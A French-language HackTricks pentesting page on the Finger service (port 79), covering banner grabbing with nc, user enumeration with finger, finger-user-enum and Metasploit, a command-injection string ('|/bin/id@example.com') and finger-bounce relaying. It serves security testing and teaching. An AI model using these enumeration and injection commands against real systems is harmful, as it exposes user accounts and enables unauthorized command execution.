hacktricks/network-services-pentesting/pentesting-finger.md

4.1 KiB

79 - Pentesting Finger

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Informations de base

Le programme/service Finger est utilisé pour récupérer des détails sur les utilisateurs d'ordinateurs. En général, les informations fournies incluent le nom d'utilisateur, le nom complet de l'utilisateur et, dans certains cas, des détails supplémentaires. Ces détails supplémentaires pourraient inclure l'emplacement du bureau et le numéro de téléphone (si disponible), l'heure à laquelle l'utilisateur s'est connecté, la période d'inactivité (temps d'inactivité), la dernière fois que l'utilisateur a lu ses e-mails, et le contenu des fichiers de plan et de projet de l'utilisateur.

Port par défaut : 79

PORT   STATE SERVICE
79/tcp open  finger

Énumération

Récupération de bannière/Connexion de base

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Énumération des utilisateurs

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternatively you can use finger-user-enum from pentestmonkey, quelques exemples:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap exécute un script pour utiliser les scripts par défaut

Metasploit utilise plus de techniques que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Exécution de commandes

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Rebond de doigt

Utilisez un système comme relais de doigt

finger user@host@victim
finger @internal@external
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!

D'autres façons de soutenir HackTricks :